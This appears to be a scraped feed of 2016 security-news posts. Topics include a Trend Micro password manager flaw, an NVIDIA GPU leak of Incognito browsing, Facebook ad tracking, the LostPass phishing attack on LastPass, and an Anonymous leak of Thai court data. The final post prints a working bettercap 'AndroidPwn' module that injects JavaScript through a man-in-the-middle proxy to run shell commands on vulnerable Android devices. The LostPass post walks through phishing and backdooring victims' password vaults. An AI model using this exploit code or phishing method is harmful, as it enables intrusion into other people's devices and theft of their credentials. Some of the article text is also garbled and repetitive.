January 12, 2016, 9:51 am
$
0
0
Design Flaw in Trend Micro Security antivirus allows hackers to remotely hijacked, or infected with any malware wiped clean and have its stored passwords stolen -- even if they were encrypted .Thanks to a critical vulnerability in Trend Micro Security Software.Trend Micro has now issued a security patch for the flaw, which was contained in the password manager of the antivirus package. Users should update the software as soon as possible. 
Tavis Ormandy, of Google Project Zero -- an assembled team of security researchers whose mission is to track down and resolve security holes in the world's software -- discovered the design flaw. Google's Project Zero security researcher, Tavis Ormandy, discovered the remote code execution flaw in Trend Micro Antivirus Password Manager component, allowing hackers to steal users’ passwords.In short, once compromised, all your accounts passwords are gone. Ormandy posted his findings to the Google Security Research blog, urging that Trend Micro "should be paging people to get this fixed." 
"I don't even know what to say -- how could you enable this thing *by default* on all your customer machines without getting an audit from a competent security consultant?" Ormandy wrote in one of a series of emails -- repeated on the blog -- to Trend Micro after finding the vulnerability. "You need to come up with a plan for fixing this right now. Frankly, it also looks like you're exposing all the stored passwords to the internet, but let's worry about that screw up after you get the remote code execution under control."
One of Ormandy's findings was that any webpage could run commands directly onto PCs that had the flawed software installed. Such commands include wiping the computer, downloading and installing malware onto it, and uninstalling the Trend Micro antivirus software.
Digging further into the Trend Micro Password Manager, Ormandy discovered that a malicious script could steal all passwords stored in the browser, even if they were encrypted. Ormandy warned Trend Micro that it needed to hire a cybersecurity professional. 
"This means anyone on the internet can steal all of your passwords completely silently, as well as execute arbitrary code with zero user interaction," Ormandy wrote in another email to Trend Micro. "In my opinion, you should temporarily disable this feature for users, then hire an external consultancy to audit the code." 
"The worst thing you can do is leave users exposed while you clean this thing up," he continued.
Google's Project Zero gives companies 90 days to fix problems before releasing its findings to the public. Trend Micro patched up the vulnerability within a week. A new version of the antivirus software is now available. 
Trend Micro published a blog about the vulnerability after it had released the mandatory update. 
"The most important thing to know is that the critical vulnerabilities in the public report have been fixed for all Trend Micro Password Manager customers," Christopher Budd, global threat communications at Trend Micro, wrote in the post. "We responded quickly to the initial report and worked with Tavis throughout the process to understand the issue and address them. Thanks to his responsible work with us, we were able to address the most critical issues he brought us in less than one week. We are not aware of any active attacks against these vulnerabilities in that time."
Ormandy has previously exposed vulnerabilities in security products from AVG, Kaspersky Lab, FireEye and Sophos.
Search

Bug in NVIDIA GPU reveals all your browsing history even in Chrome Incognito mode

January 12, 2016, 11:02 pm
$
0
0
chrome incognito
So far we have all found solace in the fact that the Chrome Incognito mode and Firefox Private Browsing exist to allow us keep our intimate encounters (read porn history) to ourselves. However, what came to the rescue while gaming could be putting us in trouble in this regard.
An Nvidia based bug has been plaguing your PCs for years that can expose our private browsing history to everyone.
So what happened was that a Diablo 3 fan, while loading the game, saw that images from his Chrome Incognito were being displayed on the screen. Technically, those details should not even be easily accessible on the device let alone being displayed openly.
The guy whose name is Evan Anderson took to Google and even submitted a bug report. On his blog he explained how exactly this is happening:
GPU memory is not erased before giving it to an application. This allows the contents of one application to leak into another. When the Chrome incognito window was closed, it’s framebuffer was added to the pool of free GPU memory, but it was not erased. When Diablo requested a framebuffer of its own, Nvidia offered up the one previously used by Chrome. Since it wasn’t erased, it still contained the previous contents. Since Diablo doesn’t clear the buffer itself (as it should), the old incognito window was put on the screen again.
Sadly, Google says that Chrome Incognito mode does not guarantee that your private browsing data will be saved on a shared computer.
The bug is related to Nvidia and so long as it gets fixed, if you are using their GPU you could be next.

Find out how Facebook knows everything about you

January 13, 2016, 10:08 am
$
0
0

Do you know Facebook knows everything about you and your preferences? Find out how

If you are a Facebook user, then you should know that by using Facebook, you have given consent to the company to track your activity for advertisers, who in turn hope to show you products that you will want to buy. This means that you cannot opt out of ads on Facebook unless you stop using Facebook completely.
However, you can do a lot to control the ads you see and stop Facebook from tracking what you do on the rest of the internet in service of its advertisers.
Besides all the usual arguments about privacy, there is another good reason to figure out what Facebook knows about you. It shows you ads based on what it thinks you like. The better it does this, the more likely you are going to see ads on things that truly interest you.

Facebook has three ways to figure you out

According to Business Insider, Facebook finds out information about you from what you tell them directly (name, age, marital status, parental status, where you live, work, went to school, etc.), what you do while you are on Facebook (stuff you have “liked”, groups you joined, photos you shared), and all the other things you do outside of Facebook on the internet. This includes the websites you visit, which track this information via cookies. Facebook reads these cookies and uses that information to display ads on its site and other websites.

Visit your Ad Preferences to see what Facebook thinks you like

It’s easy to see the things you’ve directly shared with Facebook (and your friends) on your Timeline profile page. However, to view a full total of what Facebook thinks you like, you need to find a tool called Ad Preferences.
So, Facebook has published a slideshow that helps you it, since it may sound unfamiliar. You can find it by using the controls Facebook has inserted into the ads themselves.
Go to your Facebook news feed. Move your mouse over any ad you see in the right-hand column and look for the little “x” to appear in the corner of the ad and click on it. Otherwise, you can look for an ad in your news stream, look for a little arrow and click on it.
By locating “Why am I seeing this?” you can reach the Ad Preferences page where you can tell Facebook which types of ads you prefer.
Facebook ad controls
In fact, Facebook states that changing this “won’t change how many ads you see…because we’ll know more about what you like, [the ads that appear]should be more relevant.”

Click on Manage Your Ad Preferences

Based on the things you have liked, you can manage your ad preferences from a list of generic categories. Under each entry are the specific categories and things you have liked. These influence the ads you see.
Facebook ad preferences1
Even after you change your preferences Facebook warns that, “you might still see ads that seem related to things you removed. For example, you might see an ad if it’s broadly targeted to everyone in your town or city.”

You can make Facebook stop tracking you on the internet

You can also make Facebook stop tracking you on the internet by selecting the lock icon in the top blue bar, then click on “Ads” in the left column and switch it off.
Facebook ad controls
While this will not stop Facebook from showing you just as many ads, it won’t be using your web activity for them.
Facebook ad preferences4
You can also decline other companies from tracking your web activity for ads through the Digital Advertising Alliance in the USA, Digital Advertising Alliance of Canada in Canada or the European Digital Advertising Alliance in Europe.
Facebook ad settings
You can also opt out of letting other companies track your web activity for ads through the Digital Advertising Alliance in the USA, Digital Advertising Alliance of Canada in Canada or the European Digital Advertising Alliance in Europe.

Here's How Attacker Steal a LastPass User's Email, Password, And Even Two-Factor Auth Code

January 17, 2016, 9:39 am
$
0
0
A phishing attack against LastPass that allows an attacker to steal a LastPass user's email, password, and even two-factor auth code, giving full access to all passwords and documents stored in LastPass.
I call this attack LostPass. The code is available via Github.
LostPass works because LastPass displays messages in the browser that attackers can fake. Users can't tell the difference between a fake LostPass message and the real thing because there is no difference. It's pixel-for-pixel the same notification and login screen.
I will be discussing LostPass at ShmooCon 2016 at 10am EST today. You can watch the live stream here. I will update this post with my slides and the video when they become available.

Pixel-perfect Phishing

A few months ago, LastPass displayed a message on my browser that my session had expired and I needed to log in again. I hadn't used LastPass in a few hours, and hadn't done anything that would have caused me to be logged out. When I went to click the notification, I realized something: it was displaying this in the browser viewport. An attacker could have drawn this notification.
LastPass error notification
Any malicious website could have drawn that notification. Because LastPass trained users to expect notifications in the browser viewport, they would be none the wiser. The LastPass login screen and two-factor prompt are drawn in the viewport as well.
LastPass login screenLastPass two-factor screen
Since LastPass has an API that can be accessed remotely, an attack materialized in my mind.

The Attack

Here are the steps for LostPass, in order.

Visit the malicious site

Get the victim to go to a malicious website that looks benign, or a real website that is vulnerable to XSS. This is where we'll deploy lostpass.js. Unlike most phishing attacks, users won't be on their guard because this isn't supposed to be a secure website. It could be a funny video or image, even.

Check for LastPass and show the notification

If they have LastPass installed, show the login expired notification and log the user out of LastPass. LastPass is vulnerable to a logout CSRF, so any website can log any user out of LastPass. This will make it appear to the user that they are truly logged out.
LostPass notification screen

Direct the victim to the login page

Once the victim clicks on the fake banner, direct them to an attacker-controlled login page that looks identical to the LastPass one. This is the login page for Chrome.
LostPass login screen
Notice the domain, "chrome-extension.pw". This looks similar to the Chrome protocol for real extensions "chrome-extension". There is an open issue in Chromium to address this.

Get the credentials

The victim will enter their password and send the credentials to the attacker's server. The attacker's server will check if the credentials are correct by calling LastPass's API. The API will inform us if two-factor authentication is required.
If the username and password is incorrect, we'll redirect the user back to the malicious website, but this time, the LostPass notification bar will say "Invalid Password".
If the user has two-factor authentication, redirect them to a two-factor prompt, like so:
LostPass 2fa screen

Download the vault

Once the attacker has the correct username and password (and two-factor token), download all of the victim's information from the LastPass API. We can install a backdoor in their account via the emergency contact feature, disable two-factor authentication, add the attacker's server as a "trusted device". Anything we want, really.

Anonymous Exposes 1GB Data Belonging to Thailand’s Supreme Court

January 17, 2016, 10:26 pm
$
0
0
The data reportedly belongs to the Supreme Court of Thailand. It seems like the data, which was uploaded yesterday, was stolen last Wednesday when the Anonymous launched DDoS attacks against hundreds of Thai court websites.
The Blink Hacker Group, which is among the many divisions of Anonymous, accidentally stumbled upon this massive wealth of data while attempting to deface Thailand Supreme Court website. The stolen data includes documents, payrolls and other valuable information. Blink Hacker Group is also participating in this operation with Anonymous.
The Blink Hacker Group is also participating in this operation with Anonymous. According to the hackers, apart from information related to the website of the Supreme Court, their team also got hold of data related to the day-to-day operations of the institution.
Evidently, the system administrator of the court believed that it would be a safe bet to use the Web server as a database for storing a variety of information like budget files, payroll slips, pension information and criminal case data.
Not to forget, that the sysadmin stored such massive database on a single machine, thereby making the job of hacker pretty simplistic. So, the hackers stole the data and now have exposed it online, after all, they all are after the unjust Thai justice system and the corrupt ways of the legal and law enforcement departments.
Apparently, with operation #BoycottThailand, Anonymous aims to pressurize Thai legal system. This operation was started after the Thai Supreme Court sentenced two Myanmar migrant workers to death.
The two workers were accused of raping and murdering two British tourists. In a 37-minute long video, which was released by Anonymous and a press statement, the hacker group explained in detail why it was after Thailand’s police and justice departments.
david-miller-hannah-witheridge
The group detailed a long list of criminal cases created against the immigrants in Thailand, which were seemingly based upon dodgy evidence.
As per Anonymous, the law enforcement tortured the accused individuals in all the cases and also, surprisingly, in all the listed cases police lost key evidence that could have helped the suspects gain freedom.
Another ironic similarity between the cases as mentioned by Anonymous was that all involved foreign tourists who were visiting Thailand.
Anonymous believes that Thailand justice and law enforcement institutions are making a mockery out of these trials just to keep the country’s image as a tourist haven intact even on the cost of sacrificing lives of the innocent workers/immigrants.

Vulnerability In Web View Put Android Device Vulnerable To "MITM" Attack

January 18, 2016, 11:47 pm
$
0
0
Recently I've been playing with Android's WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.
hacked
There's an excellent post about this vulnerability, long story short, if there's an app which is using aWebView UI control and it's declaring a custom javascript interface for it like so:
public class WebViewGUI extends Activity {  
  WebView mWebView;
  public void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    mWebView=new WebView(this);
    mWebView.getSettings().setJavaScriptEnabled(true);
    mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
    mWebView.loadUrl("file:///android_asset/www/index.html");
    setContentView(mWebView);
  }

  final class JavaScriptInterface {
    JavaScriptInterface () { }
    public String getSomeString() {
      return "string";
    }
  }
}
you can inject some special javascript into that page and make that device execute any shell command you want.
In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap and for this purpose I've wrote the AndroidPwn transparent proxy module.
class AndroidPwn < BetterCap::Proxy::Module  
  @@command = nil
  @@payload = "<script>\n" +
"var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
"for(i in top) {\n" +
" try {\n" +
"   top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
"   break;\n" +
" }\n" +
"catch(e) {}\n" +
"}\n" +
"</script>"

  def self.on_options(opts)
    opts.separator ""
    opts.separator "AndroidPwn Proxy Module Options:"
    opts.separator ""

    opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
      @@command = v.strip
      @@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
    end
  end

  def initialize
    raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
  end

  def on_request( request, response )
    if is_exploitable?( request, response )
      BetterCap::Logger.info ""
      BetterCap::Logger.info "Pwning Android Device :".red
      BetterCap::Logger.info "  URL    : http://#{request.host}#{request.url}"
      BetterCap::Logger.info "  AGENT  : #{request.headers['User-Agent']}"
      BetterCap::Logger.info ""

      response.body.sub!( '</head>', "</head>#{@@payload}" )
    end
  end

  private

  def is_exploitable?(req,res)
    req.headers.has_key?('User-Agent') and \
    req.headers['User-Agent'].include?("Android") and \
    req.headers['User-Agent'].include?("AppleWebKit") and \
    res.content_type =~ /^text\/html.*/ and \
    res.code == '200'
  end
end
As you can see, you just need to activate it and specify a --command COMMAND command line argument and you're ready to go.
androidpwn
Leave it running and it will automatically perform a Man-In-The-Middle attack on your network and execute the command(s) you've chosen on every single Android device it will find on the network.
Source:Evilsocket
Viewing all 239 articles
Browse latest View live
Search